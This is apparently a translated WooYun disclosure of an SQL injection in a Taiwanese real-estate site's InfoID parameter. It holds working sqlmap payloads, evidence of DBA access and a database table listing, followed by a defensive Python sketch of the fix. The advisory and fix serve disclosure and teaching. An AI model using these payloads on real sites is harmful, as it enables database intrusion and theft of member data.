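Vulnerability summary

Bug ID: wooyun-2015-0165298

Title: 588集屋網 has an SQL injection / 122 databases / member information leak / DBA (Taiwan region)

Vendor: 588集屋網

Author: 路人甲

Submitted: 2015-12-28 17:24

Fixed: 2016-02-09 23:29

Publicly disclosed: 2016-02-09 23:29

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (Hitcon, the Taiwan Internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org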


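Vulnerability details

Disclosure status:

2015-12-28: Details sent to the vendor, awaiting vendor handling
2015-12-28: Vendor has confirmed; details disclosed to the vendor only
2016-01-07: Details disclosed to core white hats and experts in related fields
2016-01-17: Details disclosed to regular white hats
2016-01-27: Details disclosed to trainee white hats
2016-02-09: Details disclosed to the public

Brief description:

Detailed description:

588集屋網: provides brokerage services for buying, selling and renting pre-owned, pre-sale and newly built homes in the central region. It is a professional real-estate website that offers consumers and real-estate agents in the greater Taichung area the most complete information on pre-sale homes, pre-owned homes and rentals, along with real-estate news and reports.
Injection point: http://**.**.**.**/information.php?InfoID=1963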

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: InfoID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: InfoID=1963 AND 2308=2308
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: InfoID=1963 AND (SELECT 4968 FROM(SELECT COUNT(*),CONCAT(0x716b787171,(SELECT (ELT(4968=4968,1))),0x71786b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: InfoID=1963 AND (SELECT * FROM (SELECT(SLEEP(5)))HaCL)
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: InfoID=-5047 UNION ALL SELECT NULL,NULL,CONCAT(0x716b787171,0x576f455377564e745644,0x71786b7a71),NULL,NULL--
Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL--
---
web application technology: Apache 2.2.22, PHP 5.2.17
back-end DBMS: MySQL 5.0
current database: 'sosohouse_db'
current user is DBA: True


available databases [122]:


Tables in the current database

Database: sosohouse_db
+-----------------+---------+
| Table | Entries |
+-----------------+---------+
| webcount | 294829 |
| articlereply | 2848 |
| news | 2215 |
| tbinfo | 1948 |
| tbmid | 1821 |
| uperdata | 1458 |
| dfdmember | 1400 |
| orderview | 1398 |
| M1676 | 993 |
| member | 958 |
| tbnew | 727 |
| keyword_content | 450 |
| tbbuilder | 383 |
| adpostx | 291 |
| tbran | 273 |
| vipdata | 93 |
| googlesigh | 87 |
| goodhouse | 79 |
| problemreport | 73 |
| adpost | 70 |
| message | 69 |
| tbrentad | 69 |
| articlesubject | 68 |
| matchsheet | 55 |
| mover | 41 |
| buyaad | 38 |
| nameandlink | 28 |
| googp | 11 |
| vote | 9 |
| keyword_table | 7 |
| catalogs | 6 |
| monthrecommend | 6 |
| tbmidbt1 | 6 |
| vote_item | 5 |
| dfd_mailto | 4 |
| tbmidbt | 4 |
| tbmidbt01 | 4 |
| tbmidbt02 | 4 |
| tbnew_hc | 4 |
| tbnew_tp | 4 |
| tbnew_tpc | 4 |
| tbnewbt | 4 |
| tbranbt | 4 |
| tbranbt01 | 4 |
| tbranbt02 | 4 |
| admin_sheet | 3 |
| discussion | 3 |
| tbnew_hcc | 3 |
| tbnew_tyc | 3 |
| declaire | 2 |
| tbbanner | 2 |
| count_set | 1 |
| rightsheet | 1 |
| tbnew_mlc | 1 |
| tbnew_tcc | 1 |
| vote_title | 1 |
+-----------------+---------+

Proof of vulnerability:

Fix:
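
As an added illustration (not part of the original report, and not the site's code), this Python sketch uses an in-memory SQLite table as a stand-in for the MySQL back end. It shows why the boolean-based probe on `InfoID` works against a concatenated query, and how a bound parameter plus integer validation removes it. The table `info`, its rows and all function names are assumptions; the true probe is the payload quoted in the report.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the site's article table (constructed sample rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE info (InfoID INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO info VALUES (?, ?)",
                   [(1963, "sample article"), (1964, "another article")])
    return db

def lookup_vulnerable(db, info_id):
    # Assumed flaw: the raw GET value is spliced into the SQL text, so whatever
    # follows the number is parsed as part of the WHERE clause.
    return db.execute("SELECT title FROM info WHERE InfoID = " + info_id).fetchall()

def lookup_bound(db, info_id):
    # Bound parameter: the whole value is data and never becomes SQL syntax.
    return db.execute("SELECT title FROM info WHERE InfoID = ?", (info_id,)).fetchall()

def lookup_hardened(db, info_id):
    # Allow-list first: InfoID must be a short ASCII decimal integer.
    if not (info_id.isascii() and info_id.isdigit() and len(info_id) <= 10):
        raise ValueError("InfoID must be a decimal integer")
    return lookup_bound(db, int(info_id))

def rejected(db, value):
    try:
        lookup_hardened(db, value)
        return False
    except ValueError:
        return True

def demo():
    db = make_db()
    true_probe = "1963 AND 2308=2308"    # payload quoted in the report
    false_probe = "1963 AND 2308=2309"   # constructed false counterpart
    return {
        # Different answers for true/false conditions: the inference channel.
        "vulnerable": (lookup_vulnerable(db, true_probe), lookup_vulnerable(db, false_probe)),
        # Same (empty) answer for both: the condition is no longer evaluated.
        "bound": (lookup_bound(db, true_probe), lookup_bound(db, false_probe)),
        "rejected": (rejected(db, true_probe), rejected(db, false_probe)),
        "legit": lookup_hardened(db, "1963"),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Binding closes the injection itself; the `current user is DBA: True` line and the 122 visible databases are a separate exposure, which a per-site MySQL account limited to its own database would contain.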

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 17

Confirmed: 2015-12-28 18:11

Vendor reply:

Thank you for the report

Latest status:

None yet